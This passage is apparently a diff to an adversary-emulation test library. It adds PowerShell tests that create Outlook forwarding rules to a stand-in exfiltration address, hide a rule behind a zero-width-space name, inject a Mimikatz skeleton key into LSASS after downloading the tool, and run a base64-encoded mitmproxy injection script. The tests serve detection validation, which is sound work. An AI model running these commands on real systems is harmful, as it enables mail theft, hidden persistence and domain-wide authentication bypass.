+        threat scenarios where adversaries establish forwarding rules to exfiltrate
+        mail. One of the most commonly observed real-world abuses of Outlook rules.
+        Detected by Exchange mail flow anomalies and Microsoft Secure Score
+        forwarding alerts.
+        NOTE: No actual email is forwarded during this test - the rule is created
+        but a trigger email is not sent. Run cleanup immediately after verification.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      input_arguments:
+        rule_name:
+          description: Name for the forwarding rule
+          type: string
+          default: AtomicTest_T1137005_ForwardExfil
+        forward_to_address:
+          description: Email address to forward mail to (use a controlled test address)
+          type: string
+          default: atomictest-exfil@redteam.local
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $rule      = $rules.Create("#{rule_name}", 0)
+
+          $action = $rule.Actions.Forward
+          $action.Enabled = $true
+          $action.Recipients.Add("#{forward_to_address}")
+          $action.Recipients.ResolveAll() | Out-Null
+
+          $rule.Enabled = $true
+          $rules.Save()
+          Write-Host "[+] Auto-forward rule '#{rule_name}' created -> #{forward_to_address}"
+          Write-Host "[!] Run cleanup immediately after verifying rule creation in Outlook."
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $outlook   = New-Object -ComObject Outlook.Application
+          $namespace = $outlook.GetNamespace("MAPI")
+          $rules     = $namespace.DefaultStore.GetRules()
+          $removed   = $false
+          for ($i = $rules.Count; $i -ge 1; $i--) {
+              if ($rules.Item($i).Name -eq "#{rule_name}") {
+                  $rules.Remove($rules.Item($i).Name)
+                  $removed = $true
+              }
+          }
+          if ($removed) {
+              $rules.Save()
+              Write-Host "[+] All instances of forwarding rule '#{rule_name}' removed."
+          } else {
+              Write-Host "[*] Rule '#{rule_name}' not found - already removed."
+          }
+    - name: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object
+      auto_generated_guid: 5ff5249a-5807-480e-ab52-c430497a8a25
+      description: |
+        Enumerates all Outlook rules configured on the local profile using the
+        PowerShell COM object. Simulates the discovery phase where an adversary
+        audits existing rules before implanting their own, or where a threat actor
+        tool such as Ruler lists rules to understand the environment. This
+        enumeration should itself generate telemetry - use it to validate that
+        your monitoring catches PowerShell spawning Outlook COM for recon purposes.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+
+          $outlook = New-Object -ComObject Outlook.Application
+          $rules   = $outlook.GetNamespace("MAPI").DefaultStore.GetRules()
+
+          Write-Host "`n[*] Enumerating Outlook rules on local profile..."
+          Write-Host "    Total rules found: $($rules.Count)`n"
+
+          for ($i = 1; $i -le $rules.Count; $i++) {
+              $r = $rules.Item($i)
+              Write-Host "  Rule $i : Name='$($r.Name)' | Enabled=$($r.Enabled)"
+          }
+
+          if ($rules.Count -eq 0) {
+              Write-Host "  (No rules configured)"
+          }
+        cleanup_command: 'Write-Host "[*] No cleanup required for enumeration test."
+
+          '
+    - name: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)
+      auto_generated_guid: cb814cf8-24f2-41dc-a1cd-1c2073276d4a
+      description: |
+        Creates an Outlook rule with a zero-width space as its display name,
+        making it appear blank and invisible in the standard Outlook Rules UI.
+        Simulates the hidden inbox rule technique documented by Damian Pfammatter
+        (2018) and referenced in MITRE ATT&CK T1137.005 - adversaries use MAPI
+        editors or Ruler to blank PR_RULE_MSG_NAME so the rule does not appear
+        during casual rule auditing. Tests whether monitoring catches rules that
+        are invisible in the Outlook GUI but detectable via MFCMapi or
+        Get-InboxRule on Exchange. Uses PlaySound action as RunApplication
+        cannot be created programmatically per Microsoft's Rules object model.
+        NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+        session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+        NOTE: Script is written to a temp file before execution to prevent the
+        ART executor's quote-wrapping from mangling the zero-width space bytes.
+      supported_platforms:
+      - windows
+      input_arguments:
+        trigger_subject:
+          description: Subject keyword to trigger the hidden rule
+          type: string
+          default: atomic-rt-hidden
+        sound_file_path:
+          description: Path to .wav file used as the rule action payload indicator
+          type: string
+          default: C:\Windows\Media\notify.wav
+      dependencies:
+      - description: Classic Outlook must be installed (required for COM automation)
+        prereq_command: |
+          $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+          if ($clsid) { exit 0 } else { exit 1 }
+        get_prereq_command: |
+          Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+          Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+          Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+          exit 1
+      - description: Sound file must exist for PlaySound action
+        prereq_command: 'if (Test-Path "#{sound_file_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: |
+          Write-Host "[-] Sound file not found at #{sound_file_path}"
+          Write-Host "    Specify a valid .wav file path in the sound_file_path input argument."
+          exit 1
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+              Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+              exit 1
+          }
+          $tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
+          $lines = @(
+              '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+              '$outlook   = New-Object -ComObject Outlook.Application',
+              '$namespace = $outlook.GetNamespace("MAPI")',
+              '$rules     = $namespace.DefaultStore.GetRules()',
+              '$rule      = $rules.Create($hiddenName, 0)',
+              '$cond = $rule.Conditions.Subject',
+              '$cond.Enabled = $true',
+              '$cond.Text    = @("#{trigger_subject}")',
+              '$action          = $rule.Actions.PlaySound',
+              '$action.Enabled  = $true',
+              '$action.FilePath = "#{sound_file_path}"',
+              '$rule.Enabled = $true',
+              '$rules.Save()',
+              'Write-Host "[+] Hidden rule created with zero-width space name."',
+              'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
+              'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
+          )
+          $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+          powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+          Remove-Item $tmpScript -ErrorAction SilentlyContinue
+        cleanup_command: |
+          $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+          if ($isAdmin) {
+              Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+              exit 1
+          }
+          $tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
+          $lines = @(
+              '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+              '$outlook    = New-Object -ComObject Outlook.Application',
+              '$namespace  = $outlook.GetNamespace("MAPI")',
+              '$rules      = $namespace.DefaultStore.GetRules()',
+              '$removed    = $false',
+              'for ($i = $rules.Count; $i -ge 1; $i--) {',
+              '    if ($rules.Item($i).Name -eq $hiddenName) {',
+              '        $rules.Remove($rules.Item($i).Name)',
+              '        $removed = $true',
+              '    }',
+              '}',
+              'if ($removed) {',
+              '    $rules.Save()',
+              '    Write-Host "[+] Hidden rule(s) removed."',
+              '} else {',
+              '    Write-Host "[-] Hidden rule not found - may have already been removed."',
+              '}'
+          )
+          $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+          powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+          Remove-Item $tmpScript -ErrorAction SilentlyContinue
   T1098.007:
     technique:
       type: attack-pattern
@@ -59846,7 +60299,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -59876,7 +60329,54 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
   T1556.005:
     technique:
       type: attack-pattern
@@ -62040,7 +62540,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -62067,6 +62567,7 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
+      identifier: T1568.002
     atomic_tests: []
   T1071.004:
     technique:
@@ -63031,7 +63532,66 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1659
+    atomic_tests:
+    - name: MITM Proxy Injection (Windows)
+      auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
+      description: Start mitmdump proxy with injection script in the background.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Python must be installed
+        prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'winget install --id Python.Python.3 -e
+
+          '
+      - description: curl must be installed
+        prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
+          exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'winget install --id cURL.cURL -e
+
+          '
+      - description: mitmproxy must be installed and in PATH
+        prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
+          exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'python -m pip install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
+          | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
+          -like "*mitmdump*" }) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: |
+          $code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
+          [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
+          Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
+          Start-Sleep -Seconds 5
+          if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
+          if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
+          $OutPath = "$env:TEMP\atomic_t1659_page.html"
+          curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
+          $Content = Get-Content -Path $OutPath -Raw
+          if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
+        cleanup_command: |
+          Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
   T1205:
     technique:
       type: attack-pattern
@@ -79803,7 +80363,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -79833,7 +80393,54 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
-    atomic_tests: []
+      identifier: T1556.001
+    atomic_tests:
+    - name: Skeleton Key via Mimikatz
+      auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+      description: |
+        Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+        user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+        This test must be run on an isolated domain controller and must not be performed on a production DC.
+        Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+      supported_platforms:
+      - windows
+      input_arguments:
+        mimikatz_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+          description: Path to the mimikatz executable
+        file_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+          description: File path where the zipped mimikatz file is downloaded to
+        mimikatz_url:
+          type: url
+          default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+          description: The URL for the mimikatz release zip
+        directory_path:
+          type: path
+          default: C:\ExternalPayloads\Mimikatz
+          description: Directory path for mimikatz
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Mimikatz must be present on the host machine at
+        prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+          Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+      executor:
+        command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+
+          '
+        cleanup_command: |
+          Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+          Restart-Computer -Force
+        name: powershell
+        elevation_required: true
   T1556.005:
     technique:
       type: attack-pattern
@@ -97832,7 +98439,66 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1659
+    atomic_tests:
+    - name: MITM Proxy Injection (Windows)
+      auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
+      description: Start mitmdump proxy with injection script in the background.
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: Python must be installed
+        prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'winget install --id Python.Python.3 -e
+
+          '
+      - description: curl must be installed
+        prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
+          exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'winget install --id cURL.cURL -e
+
+          '
+      - description: mitmproxy must be installed and in PATH
+        prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
+          exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: 'python -m pip install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
+          | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
+          -like "*mitmdump*" }) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: |
+          $code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
+          [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
+          Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
+          Start-Sleep -Seconds 5
+          if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
+          if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
+          $OutPath = "$env:TEMP\atomic_t1659_page.html"
+          curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
+          $Content = Get-Content -Path $OutPath -Raw
+          if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
+        cleanup_command: |
+          Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
+          Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
   T1078.001:
     technique:
       type: attack-pattern

atomics/T1027.013/T1027.013.md

@@ -35,13 +35,13 @@ $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVE
 $bytes = [System.Convert]::FromBase64String($encodedString)
 $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
 #write the decoded eicar string to file
-$decodedString | Out-File T1027.013_decodedEicar.txt
+$decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
 ```
 
 #### Cleanup Commands
 
 ```powershell
-Just delete the resulting T1027.013_decodedEicar.txt file.
+Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction Ignore
 ```
 ### Atomic Test #2: Decrypt Eicar File and Write to File
 
@@ -59,13 +59,13 @@ $key = [byte]1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2
 $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
 $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
 #Write the decrypted eicar string to a file
-$decryptedString | out-file T1027.013_decryptedEicar.txt
+$decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
 ```
 
 #### Cleanup Commands
 
 ```powershell
-Just delete the resulting T1027.013_decryptedEicar.txt file.
+Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force -ErrorAction Ignore
 ```
 ### Atomic Test #3: Password-Protected ZIP Payload Extraction and Execution
 

atomics/T1027.013/T1027.013.yaml

@@ -14,8 +14,8 @@ atomic_tests:
       $bytes = [System.Convert]::FromBase64String($encodedString)
       $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
       #write the decoded eicar string to file
-      $decodedString | Out-File T1027.013_decodedEicar.txt
-    cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+      $decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
+    cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction Ignore
     name: powershell
     elevation_required: false
 - name: Decrypt Eicar File and Write to File
@@ -32,8 +32,8 @@ atomic_tests:
       $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
       $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
       #Write the decrypted eicar string to a file
-      $decryptedString | out-file T1027.013_decryptedEicar.txt
-    cleanup_command: Just delete the resulting T1027.013_decryptedEicar.txt file.
+      $decryptedString | Out-File $env:temp\T1027.013_decryptedEicar.txt
+    cleanup_command: Remove-Item $env:temp\T1027.013_decryptedEicar.txt -Force -ErrorAction Ignore
     name: powershell
     elevation_required: false
 - name: Password-Protected ZIP Payload Extraction and Execution

atomics/T1071.004/src/T1071-dns-beacon.ps1

@@ -13,6 +13,6 @@ Do {
     $TimeNow = Get-Date
     Resolve-DnsName -type $QueryType $Subdomain".$(Get-Random -Minimum 1 -Maximum 999999)."$Domain -QuickTimeout
     $Jitter = (Get-Random -Minimum -$C2Jitter -Maximum $C2Jitter) / 100 + 1
-    Start-Sleep -Seconds $C2Interval
+    Start-Sleep -Seconds ($C2Interval * $Jitter)
 }
 Until ($TimeNow -ge $RunEnd)

atomics/T1137.005/T1137.005.md

@@ -0,0 +1,502 @@
+# T1137.005 - Office Application Startup: Outlook Rules
+
+## Description from ATT&CK
+
+> Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+> 
+> Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+
+[Source](https://attack.mitre.org/techniques/T1137/005)
+
+## Atomic Tests
+
+- [Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object](#atomic-test-1-outlook-rule---subject-trigger-with-deletepermanently-action-via-com-object)
+- [Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object](#atomic-test-2-outlook-rule---sender-address-trigger-with-deletepermanently-action-via-com-object)
+- [Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object](#atomic-test-3-outlook-rule---auto-forward-emails-to-external-address-via-com-object)
+- [Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object](#atomic-test-4-outlook-rules---enumerate-existing-rules-via-powershell-com-object)
+- [Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion)](#atomic-test-5-outlook-rule---create-rule-with-obfuscated-blank-name-mapi-evasion)
+
+### Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
+
+Creates a malicious Outlook rule via the COM object that permanently deletes
+emails when an email with a specific subject keyword arrives. Simulates
+adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
+action as it does not require a resolved Exchange folder unlike MoveToFolder.
+NOTE: olRuleActionStartApplication cannot be created programmatically per
+Microsoft's Rules object model - DeletePermanently is used as the supported
+equivalent that generates the same rule-creation artefact.
+NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
+session. Outlook COM fails with 0x80080005 when invoked as Administrator.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `ffadc988-b682-4a68-bd7e-4803666be637`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rule_name | Name for the malicious Outlook rule | string | AtomicTest_T1137005_SubjectTrigger|
+| trigger_subject | Email subject keyword that triggers the rule | string | atomic-rt-trigger|
+
+#### Attack Commands: Run with `powershell`!
+
+```powershell
+$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+if ($isAdmin) {
+    Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+    Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+    exit 1
+}
+
